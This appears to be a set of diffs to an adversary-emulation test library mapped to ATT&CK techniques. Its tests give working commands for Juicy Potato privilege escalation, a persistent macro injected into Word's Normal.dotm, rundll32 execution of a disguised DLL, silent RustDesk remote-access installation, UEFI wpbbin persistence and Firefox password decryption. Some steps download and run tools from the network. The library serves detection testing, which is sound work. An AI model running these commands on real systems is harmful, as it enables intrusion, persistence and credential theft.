 - [Atomic Test #4 - Bad Potato](#atomic-test-4---bad-potato)

+- [Atomic Test #5 - Juicy Potato](#atomic-test-5---juicy-potato)
+

 <br/>

@@ -181,4 +183,61 @@ Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.ex



+<br/>
+<br/>
+
+## Atomic Test #5 - Juicy Potato
+This Atomic utilizes Juicy Potato to obtain privilege escalation. 
+Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions.
+This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. 
+[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f095e373-b936-4eb4-8d22-f47ccbfbe64a
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| potato_path | Path to the JuicyPotato.exe file | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;JuicyPotato.exe|
+| listening_port | COM server listen port | integer | 7777|
+| target_exe | Target executable to launch with system privileges | path | $env:windir&#92;system32&#92;notepad.exe|
+| target_CLSID | Vulnerable CLSID to impersonate privileges | string | {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}'
+```
+
+#### Cleanup Commands:
+```powershell
+get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: JuicyPotato.exe must exist on disk
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+```
+
+
+
+
 <br/>
@@ -87,3 +87,46 @@ atomic_tests:
      taskkill /f /im notepad.exe
    name: powershell
    elevation_required: true
+- name: Juicy Potato
+  auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
+  description: |-
+    This Atomic utilizes Juicy Potato to obtain privilege escalation. 
+    Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions.
+    This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. 
+    [Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
+  supported_platforms:
+  - windows
+  input_arguments:
+    potato_path:
+      description: 'Path to the JuicyPotato.exe file'
+      type: path
+      default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe 
+    listening_port:
+      description: 'COM server listen port'
+      type: integer
+      default: 7777
+    target_exe:
+      description: 'Target executable to launch with system privileges'
+      type: path
+      default: $env:windir\system32\notepad.exe
+    target_CLSID:
+      description: 'Vulnerable CLSID to impersonate privileges'
+      type: string
+      default: '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      JuicyPotato.exe must exist on disk
+    prereq_command: |
+      if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
+  executor:
+    command: |
+      cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}'
+    cleanup_command: |
+      get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
+      get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
+    name: powershell
+    elevation_required: true
@@ -0,0 +1,188 @@
+# T1137.001 - Office Application Startup: Office Template Macros.
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/001)
+<blockquote>Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)
+
+Office Visual Basic for Applications (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base template and used to execute code when the respective Office application starts in order to obtain persistence. Examples for both Word and Excel have been discovered and published. By default, Word has a Normal.dotm template created that can be modified to include a malicious macro. Excel does not have a template file created by default, but one can be added that will automatically be loaded.(Citation: enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates may also be stored and pulled from remote locations.(Citation: GlobalDotName Jun 2019) 
+
+Word Normal.dotm location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Templates\Normal.dotm</code>
+
+Excel Personal.xlsb location:<br>
+<code>C:\Users\&lt;username&gt;\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB</code>
+
+Adversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under <code>C:\Program Files (x86)\Microsoft Office\root\Office16\</code>, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) 
+
+An adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell](#atomic-test-1---injecting-a-macro-into-the-word-normaldotm-template-for-persistence-via-powershell)
+
+
+<br/>
+
+## Atomic Test #1 - Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell
+Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData = "1"
+# The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Get the value of the Key/Value pair
+$value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue
+# Logical operation to: if the value of the key/value is 1, do nothing - 
+# if the value is 0, change it to 1 and create flag1 - 
+# if it doesn't exist, create the value and flag2
+if ($value -eq "1") 
+{
+  Write-Host "The registry value '$registryValue' already exists with the required setting."
+}   
+  elseif ($value -eq "0") 
+{
+  Write-Host "The registry value was set to 0, temporarily changing to 1."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag1" > $flagPath1
+} 
+  else 
+{
+  Write-Host "The registry value '$registryValue' does not exist, temporarily creating it."
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+  echo "flag2" > $flagPath2
+}
+Add-Type -AssemblyName Microsoft.Office.Interop.Word
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Create copy of orginal template for restoral
+Copy-Item -Path $docPath -Destination $copyPath -Force
+# VBA code to be insterted as a Macro
+# Will create a scheduled task to open the Calculator at 8:04pm daily
+$vbaCode = @"
+  Sub AutoExec()
+  Dim applicationPath As String
+  Dim taskName As String
+  Dim runTime As String
+  Dim schTasksCmd As String
+  applicationPath = "C:\Windows\System32\calc.exe"
+  taskName = "OpenCalcTask"
+  runTime = "20:04"
+  schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f"
+  Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus
+  End Sub
+"@
+# Create a new instance of Word.Application
+$word = New-Object -ComObject Word.Application
+# Keep the Word application hidden
+$word.Visible = $false
+# Open the document
+$document = $word.Documents.Open($docPath)
+# Access the VBA project of the document
+$vbaProject = $document.VBProject
+# Add a new module to the VBA project
+$newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule
+# Add the VBA code to the new module
+$newModule.CodeModule.AddFromString($vbaCode)
+# Run the Macro
+$word.run("AutoExec")
+# Save and close the document
+$document.SaveAs($docPath)
+$document.Close()
+# Quit Word
+$word.Quit()
+# Release COM objects
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null
+[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null
+```
+
+#### Cleanup Commands:
+```powershell
+# Registry setting to "Trust access to the VBA project object model" in Word
+$registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+$registryValue = "AccessVBOM"
+$registryData1 = "1"
+$registryData0 = "0"
+# Defines the path each flag file created depending on the original registry state
+$flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+$flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+# Define the path of copied normal template for restoral
+$copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+# Define the path to the normal template
+$docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+# Delete the scheduled task created by the Macro
+schtasks /Delete /TN "OpenCalcTask" /F | Out-Null
+#Restore the orginal template if the backup copy exists
+if (Test-Path $copyPath)
+{
+  #Delete the injected template
+  Remove-Item -Force $docPath -ErrorAction SilentlyContinue
+  # Restore the original template
+  Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue
+  Write-Host "The original template has been restored"
+}
+  else
+{
+  Write-Host "The original template is present"
+}
+#Restore the original state of the registry key
+if (Test-Path $flagPath1) 
+{
+  # The value was originally 0, set back to 0
+  New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null
+  Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue
+  Write-Host "The original registry state has been restored"
+} 
+  elseif (Test-Path $flagPath2)
+{
+  #The value did not previously exist, delete the value
+  Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null
+  Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null
+  Write-Host "The original registry state has been restored"
+}
+  else 
+{
+  # The value was already 1, do nothing
+  Write-Host "The value $registryValue already existed in $registryKey."
+}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Microsoft Word must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+  New-Object -COMObject "Word.Application" | Out-Null
+  Stop-Process -Name "winword"
+  exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+```
+
+
+
+
+<br/>
@@ -0,0 +1,146 @@
+attack_technique: T1137.001
+display_name: 'Office Application Startup: Office Template Macros.'
+atomic_tests:
+- name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell
+  auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8
+  description: |
+    Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening.
+  supported_platforms:
+    - windows
+  dependencies:
+  - description: |
+      Microsoft Word must be installed
+    prereq_command: |
+      try {
+        New-Object -COMObject "Word.Application" | Out-Null
+        Stop-Process -Name "winword"
+        exit 0
+      } catch { exit 1 }
+    get_prereq_command: |
+      Write-Host "You will need to install Microsoft Word manually to meet this requirement"
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      # Registry setting to "Trust access to the VBA project object model" in Word
+      $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+      $registryValue = "AccessVBOM"
+      $registryData = "1"
+      # The path where a flag text file will be created if Registry setting did not already exist or if it was set to 0
+      $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+      $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+      # Get the value of the Key/Value pair
+      $value = (Get-ItemProperty -Path $registryKey -Name $registryValue -ErrorAction SilentlyContinue).$registryValue
+      # Logical operation to: if the value of the key/value is 1, do nothing - 
+      # if the value is 0, change it to 1 and create flag1 - 
+      # if it doesn't exist, create the value and flag2
+      if ($value -eq "1") 
+      {
+        Write-Host "The registry value '$registryValue' already exists with the required setting."
+      }   
+        elseif ($value -eq "0") 
+      {
+        Write-Host "The registry value was set to 0, temporarily changing to 1."
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+        echo "flag1" > $flagPath1
+      } 
+        else 
+      {
+        Write-Host "The registry value '$registryValue' does not exist, temporarily creating it."
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null
+        echo "flag2" > $flagPath2
+      }
+      Add-Type -AssemblyName Microsoft.Office.Interop.Word
+      # Define the path of copied normal template for restoral
+      $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+      # Define the path to the normal template
+      $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+      # Create copy of orginal template for restoral
+      Copy-Item -Path $docPath -Destination $copyPath -Force
+      # VBA code to be insterted as a Macro
+      # Will create a scheduled task to open the Calculator at 8:04pm daily
+      $vbaCode = @"
+        Sub AutoExec()
+        Dim applicationPath As String
+        Dim taskName As String
+        Dim runTime As String
+        Dim schTasksCmd As String
+        applicationPath = "C:\Windows\System32\calc.exe"
+        taskName = "OpenCalcTask"
+        runTime = "20:04"
+        schTasksCmd = "schtasks /create /tn """ & taskName & """ /tr """ & applicationPath & """ /sc daily /st " & runTime & " /f"
+        Shell "cmd.exe /c " & schTasksCmd, vbNormalFocus
+        End Sub
+      "@
+      # Create a new instance of Word.Application
+      $word = New-Object -ComObject Word.Application
+      # Keep the Word application hidden
+      $word.Visible = $false
+      # Open the document
+      $document = $word.Documents.Open($docPath)
+      # Access the VBA project of the document
+      $vbaProject = $document.VBProject
+      # Add a new module to the VBA project
+      $newModule = $vbaProject.VBComponents.Add(1) # 1 = vbext_ct_StdModule
+      # Add the VBA code to the new module
+      $newModule.CodeModule.AddFromString($vbaCode)
+      # Run the Macro
+      $word.run("AutoExec")
+      # Save and close the document
+      $document.SaveAs($docPath)
+      $document.Close()
+      # Quit Word
+      $word.Quit()
+      # Release COM objects
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) | Out-Null
+      [System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) | Out-Null
+    cleanup_command: |
+      # Registry setting to "Trust access to the VBA project object model" in Word
+      $registryKey = "HKCU:Software\Microsoft\Office\16.0\Word\Security"
+      $registryValue = "AccessVBOM"
+      $registryData1 = "1"
+      $registryData0 = "0"
+      # Defines the path each flag file created depending on the original registry state
+      $flagPath1 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag1.txt"
+      $flagPath2 = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\T1137-001_Flag2.txt"
+      # Define the path of copied normal template for restoral
+      $copyPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal1.dotm"
+      # Define the path to the normal template
+      $docPath = "$env:USERPROFILE\AppData\Roaming\Microsoft\Templates\Normal.dotm"
+      # Delete the scheduled task created by the Macro
+      schtasks /Delete /TN "OpenCalcTask" /F | Out-Null
+      #Restore the orginal template if the backup copy exists
+      if (Test-Path $copyPath)
+      {
+        #Delete the injected template
+        Remove-Item -Force $docPath -ErrorAction SilentlyContinue
+        # Restore the original template
+        Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction SilentlyContinue
+        Write-Host "The original template has been restored"
+      }
+        else
+      {
+        Write-Host "The original template is present"
+      }
+      #Restore the original state of the registry key
+      if (Test-Path $flagPath1) 
+      {
+        # The value was originally 0, set back to 0
+        New-ItemProperty -Path $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD -Force | Out-Null
+        Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue
+        Write-Host "The original registry state has been restored"
+      } 
+        elseif (Test-Path $flagPath2)
+      {
+        #The value did not previously exist, delete the value
+        Remove-ItemProperty -Path $registryKey -Name $registryValue | Out-Null
+        Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue | Out-Null
+        Write-Host "The original registry state has been restored"
+      }
+        else 
+      {
+        # The value was already 1, do nothing
+        Write-Host "The value $registryValue already existed in $registryKey."
+      }
@@ -38,6 +38,8 @@ Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techni

 - [Atomic Test #13 - Rundll32 with desk.cpl](#atomic-test-13---rundll32-with-deskcpl)

+- [Atomic Test #14 - Running DLL with .init extension and function](#atomic-test-14---running-dll-with-init-extension-and-function)
+

 <br/>

@@ -590,4 +592,52 @@ del not_an_scr.scr



+<br/>
+<br/>
+
+## Atomic Test #14 - Running DLL with .init extension and function
+This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2d5029f0-ae20-446f-8811-e7511b58e8b6
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dll_file | The DLL file to be called | string | PathToAtomicsFolder&#92;T1218.011&#92;bin&#92;_WT.init|
+| dll_url | The URL to the DLL file that must be downloaded | url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+rundll32.exe #{dll_file},krnl
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: The DLL file to be called must exist at the specified location (#{dll_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+```
+
+
+
+
 <br/>
@@ -295,3 +295,31 @@ atomic_tests:
      copy #{exe_to_launch} not_an_scr.scr
      rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr
    cleanup_command: del not_an_scr.scr
+
+- name: Running DLL with .init extension and function
+  auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6
+  description: |
+    This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
+    DLL created with the AtomicTestHarnesses Portable Executable Builder script.
+  supported_platforms:
+  - windows
+  input_arguments:
+    dll_file:
+      description: The DLL file to be called
+      type: string
+      default: PathToAtomicsFolder\T1218.011\bin\_WT.init
+    dll_url:
+      description: The URL to the DLL file that must be downloaded
+      type: url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init
+  dependency_executor_name: powershell
+  dependencies:
+  - description: The DLL file to be called must exist at the specified location (#{dll_file})
+    prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}"
+  executor:
+    command: |
+      rundll32.exe #{dll_file},krnl
+    name: command_prompt
@@ -32,6 +32,8 @@ Installation of many remote access software may also include persistence (e.g.,

 - [Atomic Test #11 - MSP360 Connect Execution](#atomic-test-11---msp360-connect-execution)

+- [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows)
+

 <br/>

@@ -528,4 +530,40 @@ start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S



+<br/>
+<br/>
+
+## Atomic Test #12 - RustDesk Files Detected Test on Windows
+An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. 
+Download of RustDesk installer will be at the destination location when successfully executed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f1641ba9-919a-4323-b74f-33372333bf0e
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+Start-Process -FilePath $file "/S"
+```
+
+#### Cleanup Commands:
+```powershell
+$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+Remove-Item $file1 -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>
@@ -265,3 +265,19 @@ atomic_tests:
      Stop-Process -Name "Connect" -force -erroraction silentlycontinue
    name: powershell
    elevation_required: true
+- name: RustDesk Files Detected Test on Windows
+  auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e
+  description: |
+    An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. 
+    Download of RustDesk installer will be at the destination location when successfully executed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+      Invoke-WebRequest  -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe
+      Start-Process -FilePath $file "/S"
+    cleanup_command: |-
+      $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe"
+      Remove-Item $file1 -ErrorAction Ignore
+    name: powershell
@@ -0,0 +1,48 @@
+# T1542.001 - Pre-OS Boot: System Firmware
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1542/001)
+<blockquote>Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)
+
+System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - UEFI Persistence via Wpbbin.exe File Creation](#atomic-test-1---uefi-persistence-via-wpbbinexe-file-creation)
+
+
+<br/>
+
+## Atomic Test #1 - UEFI Persistence via Wpbbin.exe File Creation
+Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+- https://github.com/tandasat/WPBT-Builder
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+echo "Creating %systemroot%\wpbbin.exe"      
+New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
+```
+
+#### Cleanup Commands:
+```powershell
+echo "Removing %systemroot%\wpbbin.exe" 
+Remove-Item -Path "$env:SystemRoot\System32\wpbbin.exe"
+```
+
+
+
+
+
+<br/>
@@ -0,0 +1,21 @@
+attack_technique: T1542.001
+display_name: "Pre-OS Boot: System Firmware"
+atomic_tests:
+- name: UEFI Persistence via Wpbbin.exe File Creation
+  auto_generated_guid: b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1
+  description: |
+    Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
+    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
+    - http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
+    - https://github.com/tandasat/WPBT-Builder
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      echo "Creating %systemroot%\wpbbin.exe"      
+      New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
+    cleanup_command: |
+      echo "Removing %systemroot%\wpbbin.exe" 
+      Remove-Item -Path "$env:SystemRoot\System32\wpbbin.exe"
+    elevation_required: true
@@ -420,7 +420,9 @@ Stop-Process -Name msedge

 ## Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py
 Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords.
-Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen.
+Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. 
+
+Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.

 **Supported Platforms:** Windows

@@ -434,10 +436,11 @@ Upon successful execution, the decrypted credentials will be output to a text fi
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;Firepwd.py|
+| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004&#92;Scripts&#92;Firepwd.py|
 | Out_Filepath | Filepath to output results to | string | $env:temp&#92;T1555.003Test8.txt|
 | VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:&#92;Program Files (x86)&#92;Microsoft Visual Studio&#92;2022&#92;BuildTools&#92;VC&#92;Auxiliary&#92;Build&#92;vcvars64.bat|
 | Python_Path | Filepath to python | string | C:&#92;Program Files&#92;Python310&#92;python.exe|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1555.004|


 #### Attack Commands: Run with `powershell`! 
@@ -445,7 +448,7 @@ Upon successful execution, the decrypted credentials will be output to a text fi

 ```powershell
 $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
 cat #{Out_Filepath}
 ```

@@ -457,16 +460,6 @@ Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue


 #### Dependencies:  Run with `powershell`!
-##### Description: Firepwd must exist at #{Firepwd_Path}
-##### Check Prereq Commands:
-```powershell
-if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
-```
 ##### Description: Firefox profile directory must be present
 ##### Check Prereq Commands:
 ```powershell
@@ -504,41 +497,42 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Pip must be installed.
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
